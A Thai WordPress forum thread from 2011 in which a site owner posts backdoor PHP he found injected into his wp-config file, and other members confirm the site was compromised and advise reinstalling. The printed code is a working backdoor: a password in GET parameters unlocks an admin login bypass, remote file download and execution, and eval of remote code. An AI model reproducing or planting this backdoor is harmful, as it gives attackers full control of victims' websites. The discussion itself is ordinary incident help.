ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comพัฒนาเว็บไซต์CMS & Free Scriptใครเคยเจอโค้ดแบบนี้บ้างใน wp-config
หน้า: [1]   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: ใครเคยเจอโค้ดแบบนี้บ้างใน wp-config  (อ่าน 760 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
KONINW
ก๊วนเสียว
*

พลังน้ำใจ: 62
ออฟไลน์ ออฟไลน์

กระทู้: 452



ดูรายละเอียด
« เมื่อ: 29 กันยายน 2011, 08:18:33 »

ผมสงสัยว่ามีโค้ดแปลกปลอมหรือเปล่า หรือโดนฝั่งสคริป

โค้ดนี้ครับ

โค๊ด:
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '72b32a1f754ba1c09b3695e0cb6cde7f'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE="JavaScript">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

บันทึกการเข้า

ไม่มีอะไรที่ไม่สำเร็จหากเราไม่ลงมือทำมัน .
KONINW
ก๊วนเสียว
*

พลังน้ำใจ: 62
ออฟไลน์ ออฟไลน์

กระทู้: 452



ดูรายละเอียด
« ตอบ #1 เมื่อ: 29 กันยายน 2011, 08:21:40 »

โดนฝั่งสคริปแน่ๆๆ 


โค๊ด:
http://cryclops.com/2011/09/hacked/

 wanwan010
บันทึกการเข้า

ไม่มีอะไรที่ไม่สำเร็จหากเราไม่ลงมือทำมัน .
makhamvan
ก๊วนเสียว
*

พลังน้ำใจ: 43
ออฟไลน์ ออฟไลน์

กระทู้: 454



ดูรายละเอียด เว็บไซต์
« ตอบ #2 เมื่อ: 29 กันยายน 2011, 09:43:36 »

ถามเอง ตอบเอง เลยนะครับ Tongue
บันทึกการเข้า


กระเป๋าเดินทางล้อลากราคาถูก ทั้งปลีกและส่ง
แบบไฟเบอร์ รุ่นหนาพิเศษ-กุญแจล็อค, แบบไฟเบอร์-กุญแจล็อค, แบบไฟเบอร์-ชิป, แบบผ้าเบาคันชักซ่อน รับทำกระเป๋าพรีเมี่ยมจ้า รวย1
kamjam
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 160
ออฟไลน์ ออฟไลน์

กระทู้: 2,278



ดูรายละเอียด
« ตอบ #3 เมื่อ: 29 กันยายน 2011, 09:46:14 »

โดนแน่ๆ  GET Pass ด้วย  Shocked
บันทึกการเข้า

hiomard
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 72
ออฟไลน์ ออฟไลน์

กระทู้: 1,029



ดูรายละเอียด เว็บไซต์
« ตอบ #4 เมื่อ: 29 กันยายน 2011, 10:41:11 »

เอามาจากไหนครับ  wanwan016
บันทึกการเข้า

KONINW
ก๊วนเสียว
*

พลังน้ำใจ: 62
ออฟไลน์ ออฟไลน์

กระทู้: 452



ดูรายละเอียด
« ตอบ #5 เมื่อ: 29 กันยายน 2011, 10:47:44 »

เอามาจากไหนครับ  wanwan016

มันอยู่ในไฟล์ wp-comfig ของ wordpress เว็บผมครับ

 wanwan009
บันทึกการเข้า

ไม่มีอะไรที่ไม่สำเร็จหากเราไม่ลงมือทำมัน .
T.mizaki
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 74
ออฟไลน์ ออฟไลน์

กระทู้: 1,407



ดูรายละเอียด
« ตอบ #6 เมื่อ: 29 กันยายน 2011, 10:52:36 »

เอามาจากไหนครับ  wanwan016

มันอยู่ในไฟล์ wp-comfig ของ wordpress เว็บผมครับ

 wanwan009

โหลด wp ตัวติดตั้งมาจากที่ไหนอะครับ
บันทึกการเข้า
XXL
ก๊วนเสียว
*

พลังน้ำใจ: 64
ออฟไลน์ ออฟไลน์

กระทู้: 467



ดูรายละเอียด
« ตอบ #7 เมื่อ: 29 กันยายน 2011, 11:28:15 »

โดนแล้วครับ คงต้องล้างระบบ ลงใหม่แน่ เพราะไม่รู้มันทำอะไรไปแล้วบ้าง
จากสคริป ข้างบน สามารถ ลงและรัน ไฟล์อะไร ที่เซิร์ฟเวอร์ ได้เลย
บันทึกการเข้า

รถไฟวิ่ง ฉึกฉัก... . . . . ...ถึงก็ช่าง..ไม่ถึงก็ช่าง..
หน้า: [1]   ขึ้นบน
พิมพ์